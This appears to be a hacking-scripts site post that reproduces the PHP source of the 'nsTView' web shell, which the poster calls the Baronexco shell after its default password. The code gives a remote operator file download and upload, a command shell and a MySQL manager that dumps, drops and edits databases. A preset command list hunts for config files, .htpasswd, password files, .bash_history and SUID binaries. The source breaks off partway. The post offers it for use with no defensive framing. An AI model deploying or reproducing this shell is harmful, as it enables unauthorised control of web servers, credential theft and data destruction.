HackingScripts

Hack Scripts for everybody

Baronexco shell

11 Feb 2014

I don’t know what this script is called, but the default password seems to be ‘baronexco’, so that’s the name I’ve give it.

Baronexco Shell Source Code

   1 <?
   2 @session_start();
   3 @set_time_limit(0);
   4 @set_magic_quotes_runtime(0);
   5 error_reporting(E_ALL & ~E_NOTICE);
   6 
   7 ###
   8 ####cfg
   9 ###
  10 ####
  11 # use password  true / false #
  12 $create_password = true;
  13 $password = "baronexco";    // default password for nstview, you can change it.
  14 
  15 # UNIX COMMANDS
  16 # description (nst) command
  17 # example: Shutdown (nst) shutdown -h now
  18 $fast_commands = "
  19 Show open ports (nst) netstat -an | grep LISTEN | grep tcp
  20 last root (nst) last root
  21 last (all users) (nst) last all
  22 Find all config.php in / (nst) find / -type f -name config.php
  23 Find all config.php in . (nst) find . -type f -name config.php
  24 Find all admin.php in / (nst) find / -type f -name admin.php
  25 Find all admin.php in . (nst) find . -type f -name admin.php
  26 Find all config.inc.php in / (nst) find / -type f -name config.inc.php
  27 Find all config.inc.php in . (nst) find . -type f -name config.inc.php
  28 Find all config.inc in / (nst) find / -type f -name config.inc
  29 Find all config.inc in . (nst) find . -type f -name config.inc
  30 Find all config.dat in / (nst) find / -type f -name config.dat
  31 Find all config.dat in . (nst) find . -type f -name config.dat
  32 Find all config* in / (nst) find / -type f -name config*
  33 Find all config* in . (nst) find . -type f -name config*
  34 Find all pass* in / (nst) find / -type f -name pass*
  35 Find all pass* in . (nst) find . -type f -name pass*
  36 Find all .bash_history in / (nst) find / -type f -name .bash_history
  37 Find all .bash_history in . (nst) find . -type f -name .bash_history
  38 Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
  39 Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
  40 Find all writable dirs/files in / (nst) find / -perm -2 -ls
  41 Find all writable dirs/files in . (nst) find . -perm -2 -ls
  42 Find all suid files in / (nst) find / -type f -perm -04000 -ls
  43 Find all suid files in . (nst) find . -type f -perm -04000 -ls
  44 Find all sgid files in / (nst) find / -type f -perm -02000 -ls
  45 Find all sgid files in . (nst) find . -type f -perm -02000 -ls
  46 Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
  47 Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
  48 OS Version? (nst) sysctl -a | grep version
  49 Kernel version? (nst) cat /proc/version
  50 cat syslog.conf (nst) cat /etc/syslog.conf
  51 Cat - Message of the day (nst) cat /etc/motd
  52 Cat hosts (nst) cat /etc/hosts
  53 Distrib name (nst) cat /etc/issue.net
  54 Distrib name (2) (nst) cat /etc/*-realise
  55 Display all process - wide output (nst) ps auxw
  56 Display all your process (nst) ps ux
  57 Interfaces (nst) ifconfig
  58 CPU? (nst) cat /proc/cpuinfo
  59 RAM (nst) free -m
  60 HDD space (nst) df -h
  61 List of Attributes (nst) lsattr -a
  62 Mount options (nst) cat /etc/fstab
  63 Is cURL installed? (nst) which curl
  64 Is wGET installed? (nst) which wget
  65 Is lynx installed? (nst) which lynx
  66 Is links installed? (nst) which links
  67 Is fetch installed? (nst) which fetch
  68 Is GET installed? (nst) which GET
  69 Is perl installed? (nst) which perl
  70 Where is apache (nst) whereis apache
  71 Where is perl (nst) whereis perl
  72 locate proftpd.conf (nst) locate proftpd.conf
  73 locate httpd.conf (nst) locate httpd.conf
  74 locate my.conf (nst) locate my.conf
  75 locate psybnc.conf (nst) locate psybnc.conf
  76 ";
  77 
  78 
  79 
  80 # WINDOWS COMMANDS
  81 # description (nst) command
  82 # example: Delete autoexec.bat (nst) del c:\autoexec.bat
  83 $fast_commands_win = "
  84 OS Version (nst) ver
  85 Tasklist  (nst) tasklist
  86 Attributes in . (nst) attrib
  87 Show open ports (nst) netstat -an
  88 ";
  89 
  90 
  91 
  92 
  93 
  94 
  95 ###
  96 ###
  97 ###ver
  98 ###
  99 ###
 100 $ver= "v2.1";
 101 
 102 ###
 103 ###
 104 ###
 105 ###
 106 ###
 107 ####
 108 $pass=$_POST['pass'];
 109 if($pass==$password){
 110 $_SESSION['nst']="$pass";
 111 }
 112 if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
 113 else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
 114 else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
 115 else $ip = $_SERVER['REMOTE_ADDR'];
 116 $ip=htmlspecialchars($ip);
 117 
 118 if($create_password==true){
 119 
 120 if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
 121 die("
 122 <title>nsTView $ver:: nst.void.ru</title>
 123 <center>
 124 <table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
 125 <font size=1 face=verdana><center>
 126 <b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
 127 </center>
 128 <form method=post>
 129 Password:<br>
 130 <input type=password name=pass size=30 tabindex=1>
 131 </form>
 132 <b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
 133 <b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
 134 <b>Your ip:</b> ".$ip."
 135 </td></tr></table>
 136 ");}
 137 
 138 }
 139 $d=$_GET['d'];
 140 
 141 function adds($editf){
 142 #if(get_magic_quotes_gpc()==0){
 143 $editf=addslashes($editf);
 144 #}
 145 return $editf;
 146 }
 147 function adds2($editf){
 148 if(get_magic_quotes_gpc()==0){
 149 $editf=addslashes($editf);
 150 }
 151 return $editf;
 152 }
 153 
 154 $f   = "nst_sql.txt";
 155 $f_d = $_GET['f_d'];
 156 
 157 if($_GET['download']){
 158 $download=$_GET['download'];
 159 header("Content-disposition: attachment; filename=\"$download\";");
 160 readfile("$d/$download");
 161 exit;}
 162 
 163 if($_GET['dump_download']){
 164 header("Content-disposition: attachment; filename=\"$f\";");
 165 header("Content-length: ".filesize($f_d."/".$f));
 166 header("Expires: 0");
 167 readfile($f_d."/".$f);
 168 if(is_writable($f_d."/".$f)){
 169 unlink($f_d."/".$f);
 170 }
 171 die;
 172 }
 173 
 174 
 175 $images=array(".gif",".jpg",".png",".bmp",".jpeg");
 176 $whereme=getcwd();
 177 @$d=@$_GET['d'];
 178 $copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
 179 $php_self=@$_SERVER['PHP_SELF'];
 180 if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
 181 if(!isset($d)){$d=$whereme;}
 182 $d=str_replace("\\","/",$d);
 183 if(@$_GET['p']=="info"){
 184 @phpinfo();
 185 exit;}
 186 if(@$_GET['img']=="1"){
 187 @$e=$_GET['e'];
 188 header("Content-type: image/gif");
 189 readfile("$d/$e");
 190 }
 191 if(@$_GET['getdb']=="1"){
 192 header('Content-type: application/plain-text');
 193 header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
 194 }
 195 print "<title>nsT View $ver</title>
 196 <style>
 197 BODY, TD, TR {
 198 text-decoration: none;
 199 font-family: Verdana;
 200 font-size: 8pt;
 201 SCROLLBAR-FACE-COLOR: #363d4e;
 202 SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
 203 SCROLLBAR-SHADOW-COLOR: #363d4e;
 204 SCROLLBAR-ARROW-COLOR: #363d4e;
 205 SCROLLBAR-TRACK-COLOR: #91AAFF
 206 }
 207 input, textarea, select {
 208 font-family: Verdana;
 209 font-size: 10px;
 210 color: black;
 211 background-color: white;
 212 border: solid 1px;
 213 border-color: black
 214 }
 215 UNKNOWN {
 216 COLOR: #0006DE;
 217 TEXT-DECORATION: none
 218 }
 219 A:link {
 220 COLOR: #0006DE;
 221 TEXT-DECORATION: none
 222 }
 223 A:hover {
 224 COLOR: #FF0C0B;
 225 TEXT-DECORATION: none
 226 }
 227 A:active {
 228 COLOR: #0006DE;
 229 TEXT-DECORATION: none
 230 }
 231 A:visited {
 232 TEXT-DECORATION: none
 233 }
 234 </style>
 235 <script>
 236 function ShowOrHide(d1, d2) {
 237 if (d1 != '') DoDiv(d1);
 238 if (d2 != '') DoDiv(d2);}
 239 
 240 function DoDiv(id) {
 241 var item = null;
 242 if (document.getElementById) {
 243 item = document.getElementById(id);
 244 } else if (document.all){
 245 item = document.all[id];
 246 } else if (document.layers){
 247 item = document.layers[id];}
 248 if (!item) {}
 249 else if (item.style) {
 250 if (item.style.display == \"none\"){ item.style.display = \"\"; }
 251 else {item.style.display = \"none\"; }
 252 }else{ item.visibility = \"show\"; }}
 253 
 254 function cwd(text){
 255 document.sh311Form.sh3.value+=\" \"+ text;
 256 document.sh311Form.sh3.focus();
 257 }
 258 
 259 
 260 </script>
 261 ";
 262 print "<body vlink=#0006DE>
 263 <table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
 264 <tr><td><font face=wingdings size=2>0</font>";
 265 $expl=explode("/",$d);
 266 $coun=count($expl);
 267 if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
 268 else{
 269         echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
 270 for($i=1; $i<$coun; $i++){
 271         @$xx.=$expl[$i]."/";
 272 $sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
 273 $sls=str_replace("//","/",$sls);
 274 $sls=str_replace("/'></a>/","/'></a>",$sls);
 275 print $sls;
 276 }
 277 if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
 278 if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
 279 echo "</td></tr>";
 280 if($os=="unix"){ echo "
 281 <tr><td><b>id:</b> ".@exec('id')."</td></tr>
 282 <tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
 283 <tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
 284 [<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
 285 [<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
 286 [<a href='$php_self'>Home</a>]
 287 [<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
 288 [<a href='$php_self?d=$d&t=upload'>Upload</a>]
 289 [<a href='$php_self?t=tools'>Tools</a>]
 290 [<a href='$php_self?p=info'>PHPinfo</a>]
 291 [<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
 292 [<a href='$php_self?p=sql'>SQL</a>]
 293 [<a href='$php_self?p=selfremover'>Self Remover</a>]
 294 </td></tr>
 295 ";
 296 if($os=="win"){ echo "
 297 <tr><td bgcolor=white>
 298 <center><font face=wingdings size=2><</font>
 299 <a href='$php_self?d=a:/'>A</a>
 300 <a href='$php_self?d=b:/'>B</a>
 301 <a href='$php_self?d=c:/'>C</a>
 302 <a href='$php_self?d=d:/'>D</a>
 303 <a href='$php_self?d=e:/'>E</a>
 304 <a href='$php_self?d=f:/'>F</a>
 305 <a href='$php_self?d=g:/'>G</a>
 306 <a href='$php_self?d=h:/'>H</a>
 307 <a href='$php_self?d=i:/'>I</a>
 308 <a href='$php_self?d=j:/'>J</a>
 309 <a href='$php_self?d=k:/'>K</a>
 310 <a href='$php_self?d=l:/'>L</a>
 311 <a href='$php_self?d=m:/'>M</a>
 312 <a href='$php_self?d=n:/'>N</a>
 313 <a href='$php_self?d=o:/'>O</a>
 314 <a href='$php_self?d=p:/'>P</a>
 315 <a href='$php_self?d=q:/'>Q</a>
 316 <a href='$php_self?d=r:/'>R</a>
 317 <a href='$php_self?d=s:/'>S</a>
 318 <a href='$php_self?d=t:/'>T</a>
 319 <a href='$php_self?d=u:/'>U</a>
 320 <a href='$php_self?d=v:/'>V</a>
 321 <a href='$php_self?d=w:/'>W</a>
 322 <a href='$php_self?d=x:/'>X</a>
 323 <a href='$php_self?d=y:/'>Y</a>
 324 <a href='$php_self?d=z:/'>Z</a>
 325 </td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
 326 print "<tr><td>
 327 :: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
 328 <a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
 329 <a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
 330 if($os=="unix"){
 331 print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
 332 }
 333 print "</td></tr>";
 334 
 335 
 336 
 337 
 338 
 339 if($_GET['p']=="ftp"){
 340 print "<tr><td>";
 341 
 342 
 343 
 344 print "</td></tr></table>";
 345 print $copyr;
 346 exit;
 347 }
 348 
 349 
 350 
 351 
 352 
 353 
 354 
 355 
 356 
 357 
 358 if(@$_GET['p']=="sql"){
 359 print "<tr><td>";
 360 
 361 ####
 362 
 363 $f_d = $_GET['f_d'];
 364 if(!isset($f_d)){$f_d=".";}
 365 if($f_d==""){$f_d=".";}
 366 
 367 $php_self=$_SERVER['PHP_SELF'];
 368 $delete_table=$_GET['delete_table'];
 369 $tbl=$_GET['tbl'];
 370 $from=$_GET['from'];
 371 $to=$_GET['to'];
 372 $adress=$_POST['adress'];
 373 $port=$_POST['port'];
 374 $login=$_POST['login'];
 375 $pass=$_POST['pass'];
 376 $adress=$_GET['adress'];
 377 $port=$_GET['port'];
 378 $login=$_GET['login'];
 379 $pass=$_GET['pass'];
 380 $conn=$_GET['conn'];
 381 if(!isset($adress)){$adress="localhost";}
 382 if(!isset($login)){$login="root";}
 383 if(!isset($pass)){$pass="";}
 384 if(!isset($port)){$port="3306";}
 385 if(!isset($from)){$from=0;}
 386 if(!isset($to)){$to=50;}
 387 
 388 
 389 ?>
 390 <style>
 391 table,td{
 392 color: black;
 393 font-face: verdana;
 394 font-size: 11px;
 395 
 396 }
 397 </style>
 398 <font color=black face=verdana size=1>
 399 <? if(!$conn){ ?>
 400 
 401 <!-- table 1 -->
 402 <table bgcolor=#D7FFA8>
 403 <tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
 404 <tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
 405 <tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
 406 <tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
 407 <tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
 408 </table>
 409 <!-- end of table 1 -->
 410 
 411 
 412 <?
 413 $conn=$_GET['conn'];
 414 $adress=$_GET['adress'];
 415 $port=$_GET['port'];
 416 $login=$_GET['login'];
 417 $pass=$_GET['pass'];
 418 if($conn){
 419 
 420 $serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
 421 if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
 422 print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
 423 print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
 424 print "<br><font color=red>[db]</font><Br>";
 425 print "<font color=white>";
 426 $res = mysql_list_dbs($serv);
 427 while ($str=mysql_fetch_row($res)){
 428 print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
 429 $tc++;
 430 }
 431 $baza=$_GET['baza'];
 432 $db=$_GET['db'];
 433 print "<font color=red>[Total db: $tc]</font><br>";
 434 if($baza){
 435 print "<div align=left><font color=green>db: [$db]</div></font><br>";
 436 $result=@mysql_list_tables($db);
 437 while($str=@mysql_fetch_array($result)){
 438 $c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
 439 $records=mysql_fetch_array($c);
 440 
 441 if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
 442 if($records[0]=="0"){
 443 print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
 444 }else{
 445 print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
 446 }
 447 mysql_free_result($c);
 448 $total_t++;
 449 }
 450 print "<br><B><font color=red>Total tables: $total_t</font></b>";
 451                                 print "<pre>";
 452 for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
 453                                 print "</pre>";
 454 } #end baza
 455 
 456 
 457 
 458 
 459 # delete table
 460 if(isset($delete_table)){
 461 mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
 462 mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
 463 print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
 464 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
 465 }
 466 # end of delete table
 467 
 468 # delete database
 469 if(isset($_GET['delete_db'])){
 470 mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
 471 print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
 472 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
 473 }
 474 # end of delete database
 475 
 476 # delete row
 477 if(isset($_POST['delete_row'])){
 478 $_POST['delete_row'] = base64_decode($_POST['delete_row']);
 479 mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
 480 $del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
 481 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
 482 }
 483 # end of delete row
 484 
 485 
 486 $vn=$_GET['vn'];
 487 print "</td><td valign=top>";
 488 print "<font color=green>Database: $db => $vn</font>";
 489 
 490 # edit row
 491 if(isset($_POST['edit_row'])){
 492 $edit_row=base64_decode($_POST['edit_row']);
 493 
 494 $r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
 495 print "<br><br>
 496        <table border=0 cellpadding=1 cellspacing=1><tr>
 497        <td><b>Row</b></td><td><b>Value</b></td></tr>";
 498 print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
 499 print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
 500 print " <input type=radio name=upd value=update checked>Update<br>
 501         <input type=radio name=upd value=insert>Insert new<br><br>";
 502 
 503 
 504 $i=0;
 505 while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
 506 foreach($mn as $key =>$val){
 507 $type  = mysql_field_type($r_edit, $i);
 508 $len  = mysql_field_len($r_edit, $i);
 509 $del .= "`$key`='".adds($val)."' AND ";
 510 $c=strlen($val);
 511 $val=htmlspecialchars($val, ENT_NOQUOTES);
 512 $str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
 513 $buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
 514 $i++;
 515 }
 516 
 517 }
 518 $delstring=base64_encode($del);
 519 print "<input type=hidden name=delstring value=\"$delstring\">";
 520 print "$buff</table><br>";
 521 print "<br>";
 522 if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
 523 
 524 
 525 
 526 
 527 if($_POST['makeupdate']){
 528 if($_POST['upd']=='update'){
 529 preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
 530 $delstring=$_POST['delstring'];
 531 $delstring=base64_decode($delstring);
 532 $delstring = substr($delstring, 0, strlen($delstring)-5);
 533 
 534 for($i=0; $i<count($matches3[0]); $i++){
 535 eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
 536 $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
 537 }
 538 $total_str = substr_replace($total_str,"",-1);
 539 $up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
 540 $up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
 541 print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
 542 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
 543 mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
 544 }#end of make update
 545 
 546 
 547 
 548 if($_POST['upd']=='insert'){
 549 preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
 550 $delstring=$_POST['delstring'];
 551 $delstring=base64_decode($delstring);
 552 $delstring = substr($delstring, 0, strlen($delstring)-5);
 553 
 554 for($i=0; $i<count($matches3[0]); $i++){
 555 eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
 556 $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
 557 }
 558 
 559 $total_str = ",,".$total_str;
 560 
 561 preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
 562 
 563 for($i=0; $i<count($matches4[1]); $i++){
 564         $matches4[1][0]=str_replace(",","",$matches4[1][0]);
 565         $total_m_i .= "`".$matches4[1][$i]."`,";
 566         $total_m_x .= "'".$matches4[2][$i]."',";
 567 }
 568 $total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
 569 $total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
 570 
 571 $make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
 572 mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
 573 print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
 574 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
 575 }#end of insert
 576 }#end of update
 577 }
 578 # end of edit row
 579 
 580 
 581 # insert new line
 582 if($_GET['ins_new_line']){
 583 $qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
 584 print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
 585 Insert new line in <b>$tbl</b> table</b><Br><br>";
 586 print "<table>";
 587 while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
 588 foreach ($new_line as $key =>$next) {
 589 $buff .= "$next ";
 590 }
 591 $expl=explode(" ",$buff);
 592 $buff2 .= $expl[0]." ";
 593 print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
 594 <td><textarea name='$expl[0]' cols=39 rows=5></textarea>
 595 </td></tr>";
 596 unset($buff);
 597 }
 598 print "</table>
 599 <center><input type=submit value=Insert name=mk_ins></form></center>";
 600 if($_POST['mk_ins']){
 601 preg_match_all("/(.*?)\s/i",$buff2,$matches3);
 602 for($i=0; $i<count($matches3[0]); $i++){
 603 eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
 604 $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
 605 }
 606 
 607 $total_str = ",,".$total_str;
 608 preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
 609 
 610 for($i=0; $i<count($matches4[1]); $i++){
 611         $matches4[1][0]=str_replace(",","",$matches4[1][0]);
 612         $total_m_i .= "`".$matches4[1][$i]."`,";
 613         $total_m_x .= "'".$matches4[2][$i]."',";
 614 }
 615 $total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
 616 $total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
 617 
 618 $make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
 619 mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
 620 print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
 621 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
 622 }#end of mk ins
 623 }#end of ins new line
 624 
 625 
 626 
 627 
 628 
 629 
 630 if(isset($_GET['rename_table'])){
 631 $rename_table=$_GET['rename_table'];
 632 print "<br><br>Rename <b>$rename_table</b> to<br><br>
 633 <form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
 634 <input name=new_name size=30><center><br>
 635 <input type=submit value=Rename></center>
 636 </form>
 637 ";
 638 
 639 if(isset($_POST['new_name'])){
 640 mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
 641 mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
 642 print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
 643 print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
 644 }
 645 
 646 }#end of rename
 647 
 648 
 649 # dump table
 650 if($_GET['dump']){
 651 if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
 652 <font color=green><b>You can change temp folder for dump file in your browser!<br>
 653 <font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
 654 Then press enter</b></font>
 655 </font>");}
 656 mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
 657 $fp = fopen($f_d."/".$f,"w");
 658 fwrite($fp, "# nsTView.php v$ver
 659 # Web: http://nst.void.ru
 660 # Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
 661 # MySQL version: ".mysql_get_server_info()."
 662 # PHP version: ".phpversion()."
 663 # Date: ".date("d.m.Y - H:i:s")."
 664 # Dump db ( $db ) Table ( $tbl )
 665 # --- eof ---
 666 
 667 ");
 668 $que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
 669 $row = mysql_fetch_row($que);
 670 fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
 671 $row[1]=str_replace("\n","\r\n",$row[1]);
 672 fwrite($fp, $row[1].";\r\n\r\n");
 673 $que = mysql_query("SELECT * FROM `$tbl`");
 674 if(mysql_num_rows($que)>0){
 675 while($row = mysql_fetch_assoc($que)){
 676 $keys = join("`, `", array_keys($row));
 677 $values = array_values($row);
 678 foreach($values as $k=>$v) {$values[$k] = adds2($v);}
 679 $values = implode("', '", $values);
 680 $sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
 681 fwrite($fp, $sql);
 682 }
 683 }
 684 fclose($fp);
 685 print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
 686 }#end of dump
 687 
 688 
 689 
 690 
 691 # db dump
 692 if($_GET['dump_db']){
 693 $c=mysql_num_rows(mysql_list_tables($db));
 694 if($c>=1){
 695 print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
 696 }else{
 697 print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
 698 die;
 699 }
 700 if(sizeof($tabs)==0){
